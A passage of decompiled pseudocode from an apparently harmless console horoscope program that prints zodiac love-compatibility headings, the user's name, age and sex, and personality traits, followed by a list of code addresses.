												if(__eax != 3) {
													__eflags = __eax - 4;
													if(__eax != 4) {
														goto L141;
													} else {
														__eax = _v32;
														__eflags = __eax - 0x13;
														if(__eflags > 0) {
															goto L139;
														} else {
															goto L137;
														}
													}
												} else {
													__eax = _v32;
													__eflags = __eax - 0x15;
													if(__eflags >= 0) {
														L137:
														__ecx =  *0x13fe242 & 0x000000ff;
														__edx = _v40;
														_push(__ecx);
														_push(0x13fe210);
														_push(_v40);
														_push(__eax);
														__eax = E013D2710(__ebx, __ecx, __edi, __esi, __eflags);
														__eax = _v36;
														__esp = __esp + 0x10;
														__eflags = __eax - 4;
														if(__eax != 4) {
															L141:
															__eflags = __eax - 5;
															if(__eax != 5) {
																goto L147;
															} else {
																__eax = _v32;
																__eflags = __eax - 0x14;
																if(__eflags > 0) {
																	goto L145;
																} else {
																	goto L143;
																}
															}
														} else {
															__eax = _v32;
															L139:
															__eflags = __eax - 0x14;
															if(__eflags >= 0) {
																L143:
																__ecx =  *0x13fe242 & 0x000000ff;
																__edx = _v40;
																_push(__ecx);
																_push(0x13fe210);
																_push(_v40);
																_push(__eax);
																__eax = E013D2E50(__ebx, __ecx, __edi, __esi, __eflags);
																__eax = _v36;
																__esp = __esp + 0x10;
																__eflags = __eax - 5;
																if(__eax != 5) {
																	L147:
																	__eflags = __eax - 6;
																	if(__eax != 6) {
																		goto L153;
																	} else {
																		__eax = _v32;
																		__eflags = __eax - 0x14;
																		if(__eflags > 0) {
																			goto L151;
																		} else {
																			goto L149;
																		}
																	}
																} else {
																	__eax = _v32;
																	L145:
																	__eflags = __eax - 0x15;
																	if(__eflags >= 0) {
																		L149:
																		__ecx =  *0x13fe242 & 0x000000ff;
																		__edx = _v40;
																		_push(__ecx);
																		_push(0x13fe210);
																		_push(_v40);
																		_push(__eax);
																		__eax = E013D3610(__ebx, __ecx, __edi, __esi, __eflags);
																		__eax = _v36;
																		__esp = __esp + 0x10;
																		__eflags = __eax - 6;
																		if(__eax != 6) {
																			L153:
																			__eflags = __eax - 7;
																			if(__eax != 7) {
																				goto L159;
																			} else {
																				__eax = _v32;
																				__eflags = __eax - 0x16;
																				if(__eflags > 0) {
																					goto L157;
																				} else {
																					goto L155;
																				}
																			}
																		} else {
																			__eax = _v32;
																			L151:
																			__eflags = __eax - 0x15;
																			if(__eflags >= 0) {
																				L155:
																				__ecx =  *0x13fe242 & 0x000000ff;
																				__edx = _v40;
																				_push(__ecx);
																				_push(0x13fe210);
																				_push(_v40);
																				_push(__eax);
																				__eax = E013D3D40(__ebx, __ecx, __edi, __esi, __eflags);
																				__eax = _v36;
																				__esp = __esp + 0x10;
																				__eflags = __eax - 7;
																				if(__eax != 7) {
																					L159:
																					__eflags = __eax - 8;
																					if(__eax != 8) {
																						goto L165;
																					} else {
																						__eax = _v32;
																						__eflags = __eax - 0x16;
																						if(__eflags > 0) {
																							goto L163;
																						} else {
																							goto L161;
																						}
																					}
																				} else {
																					__eax = _v32;
																					L157:
																					__eflags = __eax - 0x17;
																					if(__eflags >= 0) {
																						L161:
																						__ecx =  *0x13fe242 & 0x000000ff;
																						__edx = _v40;
																						_push(__ecx);
																						_push(0x13fe210);
																						_push(_v40);
																						_push(__eax);
																						__eax = E013D4490(__ebx, __ecx, __edi, __esi, __eflags);
																						__eax = _v36;
																						__esp = __esp + 0x10;
																						__eflags = __eax - 8;
																						if(__eax != 8) {
																							L165:
																							__eflags = __eax - 9;
																							if(__eax != 9) {
																								goto L171;
																							} else {
																								__eax = _v32;
																								__eflags = __eax - 0x16;
																								if(__eflags > 0) {
																									goto L169;
																								} else {
																									goto L167;
																								}
																							}
																						} else {
																							__eax = _v32;
																							L163:
																							__eflags = __eax - 0x17;
																							if(__eflags >= 0) {
																								L167:
																								__ecx =  *0x13fe242 & 0x000000ff;
																								__edx = _v40;
																								_push(__ecx);
																								_push(0x13fe210);
																								_push(_v40);
																								_push(__eax);
																								__eax = E013D4BE0(__ebx, __ecx, __edi, __esi, __eflags);
																								__eax = _v36;
																								__esp = __esp + 0x10;
																								__eflags = __eax - 9;
																								if(__eax != 9) {
																									L171:
																									__eflags = __eax - 0xa;
																									if(__eax != 0xa) {
																										goto L177;
																									} else {
																										__eax = _v32;
																										__eflags = __eax - 0x16;
																										if(__eflags > 0) {
																											goto L175;
																										} else {
																											goto L173;
																										}
																									}
																								} else {
																									__eax = _v32;
																									L169:
																									__eflags = __eax - 0x17;
																									if(__eflags >= 0) {
																										L173:
																										__ecx =  *0x13fe242 & 0x000000ff;
																										__edx = _v40;
																										__eax = E013D5310(__ebx,  *0x13fe242 & 0x000000ff, __edi, __esi, __eflags, __eax, _v40, 0x13fe210,  *0x13fe242 & 0x000000ff);
																										__eax = _v36;
																										__esp = __esp + 0x10;
																										__eflags = __eax - 0xa;
																										if(__eax != 0xa) {
																											L177:
																											__eflags = __eax - 0xb;
																											if(__eax != 0xb) {
																												goto L183;
																											} else {
																												__eax = _v32;
																												__eflags = __eax - 0x15;
																												if(__eflags > 0) {
																													goto L181;
																												} else {
																													goto L179;
																												}
																											}
																										} else {
																											__eax = _v32;
																											L175:
																											__eflags = __eax - 0x17;
																											if(__eflags >= 0) {
																												L179:
																												__ecx =  *0x13fe242 & 0x000000ff;
																												__edx = _v40;
																												_push(__ecx);
																												_push(0x13fe210);
																												_push(_v40);
																												_push(__eax);
																												__eax = E013D5B00(__ebx, __ecx, __edi, __esi, __eflags);
																												__eax = _v36;
																												__esp = __esp + 0x10;
																												__eflags = __eax - 0xb;
																												if(__eax != 0xb) {
																													L183:
																													__eflags = __eax - 0xc;
																													if(__eax != 0xc) {
																														goto L189;
																													} else {
																														__eax = _v32;
																														__eflags = __eax - 0x15;
																														if(__eflags > 0) {
																															goto L187;
																														} else {
																															goto L185;
																														}
																													}
																												} else {
																													__eax = _v32;
																													L181:
																													__eflags = __eax - 0x16;
																													if(__eflags >= 0) {
																														L185:
																														__ecx =  *0x13fe242 & 0x000000ff;
																														__edx = _v40;
																														_push(__ecx);
																														_push(0x13fe210);
																														_push(_v40);
																														_push(__eax);
																														__eax = E013D6220(__ebx, __ecx, __edi, __esi, __eflags);
																														__eax = _v36;
																														__esp = __esp + 0x10;
																														__eflags = __eax - 0xc;
																														if(__eax != 0xc) {
																															L189:
																															__eflags = __eax - 1;
																															if(__eax != 1) {
																																goto L195;
																															} else {
																																__eax = _v32;
																																__eflags = __eax - 0x13;
																																if(__eflags > 0) {
																																	goto L193;
																																} else {
																																	goto L191;
																																}
																															}
																														} else {
																															__eax = _v32;
																															L187:
																															__eflags = __eax - 0x16;
																															if(__eflags >= 0) {
																																L191:
																																__ecx =  *0x13fe242 & 0x000000ff;
																																__edx = _v40;
																																_push(__ecx);
																																_push(0x13fe210);
																																_push(_v40);
																																_push(__eax);
																																__eax = E013D6930(__ebx, __ecx, __edi, __esi, __eflags);
																																__eax = _v36;
																																__esp = __esp + 0x10;
																																__eflags = __eax - 1;
																																if(__eax != 1) {
																																	L195:
																																	__eflags = __eax - 2;
																																	if(__eax != 2) {
																																		goto L201;
																																	} else {
																																		__eax = _v32;
																																		__eflags = __eax - 0x12;
																																		if(__eflags > 0) {
																																			goto L199;
																																		} else {
																																			goto L197;
																																		}
																																	}
																																} else {
																																	__eax = _v32;
																																	L193:
																																	__eflags = __eax - 0x14;
																																	if(__eflags >= 0) {
																																		L197:
																																		__ecx =  *0x13fe242 & 0x000000ff;
																																		__edx = _v40;
																																		__eax = E013D7080(__ebx,  *0x13fe242 & 0x000000ff, __edi, __esi, __eflags, __eax, _v40, 0x13fe210,  *0x13fe242 & 0x000000ff);
																																		__eax = _v36;
																																		__esp = __esp + 0x10;
																																		__eflags = __eax - 2;
																																		if(__eax != 2) {
																																			L201:
																																			__eflags = __eax - 3;
																																			if(__eax == 3) {
																																				__eax = _v32;
																																				goto L203;
																																			}
																																			goto L205;
																																		} else {
																																			__eax = _v32;
																																			L199:
																																			__eflags = __eax - 0x13;
																																			if(__eax >= 0x13) {
																																				goto L204;
																																			} else {
																																				__eax = 0;
																																				__eflags = 0;
																																				return 0;
																																			}
																																		}
																																	} else {
																																		__eax = 0;
																																		__eflags = 0;
																																		return 0;
																																	}
																																}
																															} else {
																																__eax = 0;
																																__eflags = 0;
																																return 0;
																															}
																														}
																													} else {
																														__eax = 0;
																														__eflags = 0;
																														return 0;
																													}
																												}
																											} else {
																												__eax = 0;
																												__eflags = 0;
																												return 0;
																											}
																										}
																									} else {
																										__eax = 0;
																										__eflags = 0;
																										return 0;
																									}
																								}
																							} else {
																								__eax = 0;
																								__eflags = 0;
																								return 0;
																							}
																						}
																					} else {
																						__eax = 0;
																						__eflags = 0;
																						return 0;
																					}
																				}
																			} else {
																				__eax = 0;
																				__eflags = 0;
																				return 0;
																			}
																		}
																	} else {
																		__eax = 0;
																		__eflags = 0;
																		return 0;
																	}
																}
															} else {
																__eax = 0;
																__eflags = 0;
																return 0;
															}
														}
													} else {
														L203:
														__eflags = __eax - 0x14;
														if(__eax <= 0x14) {
															L204:
															__ecx =  *0x13fe242 & 0x000000ff;
															__edx = _v40;
															_push( *0x13fe242 & 0x000000ff);
															_push(0x13fe210);
															_push(_v40);
															_push(__eax);
															L42();
															__esp = __esp + 0x10;
														}
														L205:
														__eax = 0;
														__eflags = 0;
														return 0;
													}
												}
												goto L206;
											case 6:
												L65:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
												__eax = _a16;
												__edx = __edi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
												_push("PISCES AND ARIES LOVE COMPATIBILITY");
												 *0x13fe250 = 0x80005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0xb;
												E013D1B90(__ebx, 0xb, __edi) = _a16;
												_push(_a16);
												_push(__edi);
												_push(__ebx);
												_push(__esi);
												L42();
												__esp = 0x20 + __esp;
												goto L78;
											case 7:
												L66:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
												__ecx = _a16;
												__edx = __edi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
												_push("PISCES AND TAURUS LOVE COMPATIBILITY");
												 *0x13fe250 = 0x80005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x16;
												__eax = E013D1B90(__ebx, 0x16, __edi);
												__ecx = _a16;
												_push(_a16);
												_push(__edi);
												_push(__ebx);
												_push(__esi);
												L42();
												__esp = 0x20 + __esp;
												goto L78;
											case 8:
												L67:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
												__edx = _a16;
												__edx = __edi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
												_push("PISCES AND GEMINI LOVE COMPATIBILITY");
												 *0x13fe250 = 0x80005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x21;
												__eax = E013D1B90(__ebx, 0x21, __edi);
												__edx = _a16;
												_push(__edx);
												_push(__edi);
												_push(__ebx);
												_push(__esi);
												L42();
												__esp = 0x20 + __esp;
												goto L78;
											case 9:
												L68:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
												__eax = _a16;
												__edx = __edi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
												_push("PISCES AND CANCER LOVE COMPATIBILITY");
												 *0x13fe250 = 0x80005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x29;
												E013D1B90(__ebx, 0x29, __edi) = _a16;
												_push(_a16);
												_push(__edi);
												_push(__ebx);
												_push(__esi);
												L42();
												__esp = 0x20 + __esp;
												goto L78;
											case 0xa:
												L69:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
												__ecx = _a16;
												__edx = __edi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
												_push("PISCES AND LEO LOVE COMPATIBILITY");
												 *0x13fe250 = 0x80005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x31;
												__eax = E013D1B90(__ebx, 0x31, __edi);
												__ecx = _a16;
												_push(_a16);
												_push(__edi);
												_push(__ebx);
												_push(__esi);
												L42();
												__esp = 0x20 + __esp;
												goto L78;
											case 0xb:
												L70:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
												__edx = _a16;
												__edx = __edi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
												_push("PISCES AND VIRGO LOVE COMPATIBILITY");
												 *0x13fe250 = 0x80005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x38;
												__eax = E013D1B90(__ebx, 0x38, __edi);
												__edx = _a16;
												_push(__edx);
												_push(__edi);
												_push(__ebx);
												_push(__esi);
												L42();
												__esp = 0x20 + __esp;
												goto L78;
											case 0xc:
												L71:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
												__eax = _a16;
												__edx = __edi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
												_push("PISCES AND LIBRA LOVE COMPATIBILITY");
												 *0x13fe250 = 0x80005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x3e;
												E013D1B90(__ebx, 0x3e, __edi) = _a16;
												_push(_a16);
												_push(__edi);
												_push(__ebx);
												_push(__esi);
												L42();
												__esp = 0x20 + __esp;
												goto L78;
											case 0xd:
												L72:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
												__ecx = _a16;
												__edx = __edi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
												_push("PISCES AND SCORPIO LOVE COMPATIBILITY");
												 *0x13fe250 = 0x80005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x43;
												__eax = E013D1B90(__ebx, 0x43, __edi);
												__ecx = _a16;
												_push(_a16);
												_push(__edi);
												_push(__ebx);
												_push(__esi);
												L42();
												__esp = 0x20 + __esp;
												goto L78;
											case 0xe:
												L73:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
												__edx = _a16;
												__edx = __edi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
												_push("PISCES AND SAGGITARIUS LOVE COMPATIBILITY");
												 *0x13fe250 = 0x80005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x47;
												__eax = E013D1B90(__ebx, 0x47, __edi);
												__edx = _a16;
												_push(__edx);
												_push(__edi);
												_push(__ebx);
												_push(__esi);
												L42();
												__esp = 0x20 + __esp;
												goto L78;
											case 0xf:
												L74:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
												__eax = _a16;
												__edx = __edi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
												_push("PISCES AND CAPRICORN LOVE COMPATIBILITY");
												 *0x13fe250 = 0x80005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x4a;
												E013D1B90(__ebx, 0x4a, __edi) = _a16;
												_push(_a16);
												_push(__edi);
												_push(__ebx);
												_push(__esi);
												L42();
												__esp = 0x20 + __esp;
												goto L78;
											case 0x10:
												L75:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
												__ecx = _a16;
												__edx = __edi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
												_push("PISCES AND AQUARIUS LOVE COMPATIBILITY");
												 *0x13fe250 = 0x80005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x4c;
												__eax = E013D1B90(__ebx, 0x4c, __edi);
												__ecx = _a16;
												_push(_a16);
												_push(__edi);
												_push(__ebx);
												_push(__esi);
												L42();
												__esp = 0x20 + __esp;
												goto L78;
											case 0x11:
												L76:
												E013DB418(__ebx, __edx, __eflags, "cls") = E013D1B10();
												__edx = _a16;
												__edx = __edi;
												__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
												_push("PISCES AND PISCES LOVE COMPATIBILITY");
												 *0x13fe250 = 0x80005;
												__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
												__edx = 0x4d;
												__eax = E013D1B90(__ebx, 0x4d, __edi);
												__edx = _a16;
												_push(__edx);
												_push(__edi);
												_push(__ebx);
												_push(__esi);
												L42();
												__esp = 0x20 + __esp;
												goto L78;
										}
										L78:
										__eax = E013DB418(__ebx, __edx, __eflags, "cls");
										_push(__edi);
										_push("Name: %s");
										 *0x13fe250 = 0x30037;
										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
										__ecx = _v20;
										_push(_v20);
										_push("Age=%d");
										 *0x13fe250 = 0x40037;
										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
										__ecx = _v24;
										 *0x13fe250 = 0x50037;
										_push(E013DC111(_v24));
										_push("Sex=%c");
										__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
										__esp = 0x20 + __esp;
										__eax = E013D1B10();
										_v36 = "\n*  You are kind and gullible.";
										_v32 = "\n*  You cannot hurt anyone directly.";
										_v28 = "\n*  You are adventurous, ambitious, impulsive, enthusiastic and full of energy.";
										__eax = E013D1C60(__ebx, __ecx, __edi, __esi, __eflags);
										__eax = __eax - 1;
										__eflags = __eax - 5;
									} while (__eflags <= 0);
									_pop(__esi);
									goto L80;
								}
								goto L206;
							case 6:
								L16:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
								__edx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("aquarius AND ARIES LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0xa;
								__eax = E013D1B90(__ebx, 0xa, __edi);
								__edx = _a16;
								__eax = E013D7080(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L29;
							case 7:
								L17:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
								__eax = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("aquarius AND TAURUS LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x15;
								E013D1B90(__ebx, 0x15, __edi) = _a16;
								__eax = E013D7080(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L29;
							case 8:
								L18:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
								__ecx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("aquarius AND GEMINI LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x20;
								__eax = E013D1B90(__ebx, 0x20, __edi);
								__ecx = _a16;
								__eax = E013D7080(__ebx, _a16, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L29;
							case 9:
								L19:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
								__edx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("aquarius AND CANCER LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x28;
								__eax = E013D1B90(__ebx, 0x28, __edi);
								__edx = _a16;
								__eax = E013D7080(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L29;
							case 0xa:
								L20:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
								__eax = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("aquarius AND LEO LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x30;
								E013D1B90(__ebx, 0x30, __edi) = _a16;
								__eax = E013D7080(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L29;
							case 0xb:
								L21:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
								__ecx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("aquarius AND VIRGO LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x37;
								__eax = E013D1B90(__ebx, 0x37, __edi);
								__ecx = _a16;
								__eax = E013D7080(__ebx, _a16, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L29;
							case 0xc:
								L22:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
								__edx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("aquarius AND LIBRA LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x3d;
								__eax = E013D1B90(__ebx, 0x3d, __edi);
								__edx = _a16;
								__eax = E013D7080(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L29;
							case 0xd:
								L23:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
								__eax = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("aquarius AND SCORPIO LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x42;
								E013D1B90(__ebx, 0x42, __edi) = _a16;
								__eax = E013D7080(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L29;
							case 0xe:
								L24:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
								__ecx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("aquarius AND SAGGITARIUS LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x46;
								__eax = E013D1B90(__ebx, 0x46, __edi);
								__ecx = _a16;
								__eax = E013D7080(__ebx, _a16, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L29;
							case 0xf:
								L25:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
								__edx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("aquarius AND CAPRICORN LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x49;
								__eax = E013D1B90(__ebx, 0x49, __edi);
								__edx = _a16;
								__eax = E013D7080(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L29;
							case 0x10:
								L26:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
								__eax = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("aquarius AND AQUARIUS LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x4b;
								E013D1B90(__ebx, 0x4b, __edi) = _a16;
								__eax = E013D7080(__ebx, __ecx, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L29;
							case 0x11:
								L27:
								E013DB418(__ebx, __edx, __eflags, "cls") = E013D1AD0();
								__ecx = _a16;
								__edx = __esi;
								__eax = E013D1C00(__ebx, __edx, __edi, __esi, __eflags, _a16, __ebx);
								_push("aquarius AND PISCES LOVE COMPATIBILITY");
								 *0x13fe250 = 0x80005;
								__eax = E013DB9F5(__ebx, __edx, __edi, __esi, __eflags);
								__edx = 0x4c;
								__eax = E013D1B90(__ebx, 0x4c, __edi);
								__ecx = _a16;
								__eax = E013D7080(__ebx, _a16, __edi, __esi, __eflags, __edi, __ebx, __esi, _a16);
								__esp = 0x20 + __esp;
								goto L29;
						}
						L29:
						E013DB418(_t329, _t335, _t356, "cls");
						_push(_t342);
						_push("Name: %s");
						 *0x13fe250 = 0x30037;
						E013DB9F5(_t329, _t335, _t340, _t342, _t356);
						_push(_v20);
						_push("Age=%d");
						 *0x13fe250 = 0x40037;
						E013DB9F5(_t329, _t335, _t340, _t342, _t356);
						 *0x13fe250 = 0x50037;
						_push(E013DC111(_v24));
						_push("Sex=%c");
						E013DB9F5(_t329, _t335, _t340, _t342, _t356);
						_push("Your horoscope sign is Aquarius-The Water Bearer");
						 *0x13fe250 = 0x20003;
						E013DB9F5(_t329, _t335, _t340, _t342, _t356);
						_push("..-\"-._.-\"-._.-");
						 *0x13fe250 = 0x30005;
						E013DB9F5(_t329, _t335, _t340, _t342, _t356);
						_push("..-\"-._.-\"-._.-\n\n");
						 *0x13fe250 = 0x40005;
						E013DB9F5(_t329, _t335, _t340, _t342, _t356);
						_t346 = _t349 + 0x2c;
						_v32 = "\n*  You have great desire for material gain.";
						_v28 = "\n*  You are tireless worker and are willing to work for what you want.";
						_t291 = E013D1C60(_t329, _t331, _t340, _t342, _t356) - 1;
						_t357 = _t291 - 5;
					} while (_t291 <= 5);
					_pop(_t339);
					goto L31;
				}
				L206:
			}






















                                                                          0x013d7080
                                                                          0x013d7080
                                                                          0x013d7080
                                                                          0x013d7086
                                                                          0x013d7087
                                                                          0x013d708d
                                                                          0x013d7092
                                                                          0x013d7095
                                                                          0x013d7096
                                                                          0x013d709b
                                                                          0x013d70a5
                                                                          0x013d70aa
                                                                          0x013d70b4
                                                                          0x013d70b5
                                                                          0x013d70ba
                                                                          0x013d70c4
                                                                          0x013d70c7
                                                                          0x013d70d1
                                                                          0x013d70db
                                                                          0x013d70e3
                                                                          0x013d70e4
                                                                          0x013d70e9
                                                                          0x013d70ee
                                                                          0x013d70f3
                                                                          0x013d70fd
                                                                          0x013d7102
                                                                          0x013d7107
                                                                          0x013d7111
                                                                          0x013d7116
                                                                          0x013d711b
                                                                          0x013d7125
                                                                          0x013d712a
                                                                          0x013d712d
                                                                          0x013d7134
                                                                          0x013d7140
                                                                          0x013d7144
                                                                          0x013d77cf
                                                                          0x013d77d4
                                                                          0x013d77e7
                                                                          0x013d714a
                                                                          0x013d714a
                                                                          0x013d714b
                                                                          0x013d7150
                                                                          0x013d7150
                                                                          0x00000000
                                                                          0x013d715c
                                                                          0x013d7166
                                                                          0x013d7168
                                                                          0x013d716d
                                                                          0x013d7172
                                                                          0x013d7177
                                                                          0x013d7181
                                                                          0x013d7186
                                                                          0x013d7189
                                                                          0x013d7196
                                                                          0x013d71b7
                                                                          0x013d71ba
                                                                          0x013d7198
                                                                          0x013d71a7
                                                                          0x013d71a9
                                                                          0x013d71ac
                                                                          0x013d71b0
                                                                          0x013d71b2
                                                                          0x013d71b2
                                                                          0x013d71be
                                                                          0x013d71c0
                                                                          0x013d71c7
                                                                          0x013d71c7
                                                                          0x013d71ca
                                                                          0x013d71d5
                                                                          0x013d71dc
                                                                          0x013d71e0
                                                                          0x013d71e0
                                                                          0x013d71e4
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d71e9
                                                                          0x013d71eb
                                                                          0x013d71ec
                                                                          0x013d71f1
                                                                          0x013d71f6
                                                                          0x013d71fb
                                                                          0x013d7200
                                                                          0x013d7203
                                                                          0x013d7208
                                                                          0x013d720b
                                                                          0x013d7211
                                                                          0x013d7213
                                                                          0x013d7215
                                                                          0x013d7218
                                                                          0x013d7219
                                                                          0x013d721c
                                                                          0x013d721f
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d721f
                                                                          0x013d7221
                                                                          0x013d7226
                                                                          0x013d722b
                                                                          0x013d7230
                                                                          0x013d7235
                                                                          0x013d7238
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d724c
                                                                          0x013d7251
                                                                          0x013d725b
                                                                          0x013d7260
                                                                          0x00000000
                                                                          0x00000000
                                                                          0x013d726f
                                                                          0x013d7274
                                                                          0x013d7279
                                                                          0x013d7280
                                                                          0x013d7285
                                                                          0x013d728a
                                                                          0x013d7294
                                                                          0x013d7299
                                                                          0x013d729e
                                                                          0x013d72a8
                                                                          0x013d72ad
                                                                          0x013d72af
                                                                          0x013d72b2
                                                                          0x013d72b3
                                                                          0x013d72b8
                                                                          0x013d72c7
                                                                          0x013d72c9
                                                                          0x013d72cc
                                                                          0x013d72cd
                                                                          0x013d72d2
                                                                          0x013d72d2
                                                                          0x013d72d2
                                                                          0x013d72d4
                                                                          0x013d72d5
                                                                          0x013d72da
                                                                          0x013d72e2
